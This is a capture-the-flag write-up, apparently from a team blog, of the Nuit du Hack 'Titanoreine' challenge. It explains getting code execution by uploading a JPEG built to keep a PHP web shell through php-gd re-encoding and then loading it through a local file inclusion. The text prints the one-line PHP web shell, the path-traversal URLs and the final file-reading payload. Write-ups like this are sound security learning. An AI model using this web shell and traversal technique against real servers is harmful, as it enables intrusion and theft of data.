Titanoreine was a funny challenge. We were provided a website where we could
upload some pictures. There was also an obvious LFI. One
may think that you just have to put some php like <?php system($_GET['c']);?>
into the metadata field to get code execution. The twist here was that the
image was processed by php-gd,
trashing our precious metadata.
Notfound, from the hexpresso team reminded me that on eof the organizer was virtualabs. I vaguely remembered that he wrote an article about transformations-resistant pictures to get a php shell. He even provides a script to generate the images. What a coincidence.
First we tried to use the system command in our payload, but it seemed that it was not authorised. We switched to eval. By the way, thank you php for providing so many functions to get code execution.
Here is the image that we used,
The payload is roughly equivalent to <?php system($_GET['c']);?>
.
Feel free to transform it with php-gd with a quality of 98 (The one used by the chall. By the way, thanks to the teams that used the exploit-98.jpg filename for the hint ;) ) to see our payload with your favorite hex editor.
We lost quite some time trying to get this kind of url working:
http://gallery.nuitduhack.com/index.php?lang=../../../includes/ble.jpg?c=echo 1;
Here is the correct form:
http://gallery.nuitduhack.com/index.php?c=echo 1;lang=../../../includes/ble.jpg
or
http://gallery.nuitduhack.com/index.php?lang=../../../includes/ble.jpg&c=echo 1;
This was the "Omg plz kill me" moment of the ctf.
Anyway, we used glob and file_get_contents to get the flag.
Here is our final payload: http://gallery.nuitduhack.com/index.php?c=echo%20file_get_contents%28%27./includes/X~unsuspicious~X%27%29;&lang=../../../includes/ble.jpg
flag: WhyAreHemorrhoidsNotCalledAssteroids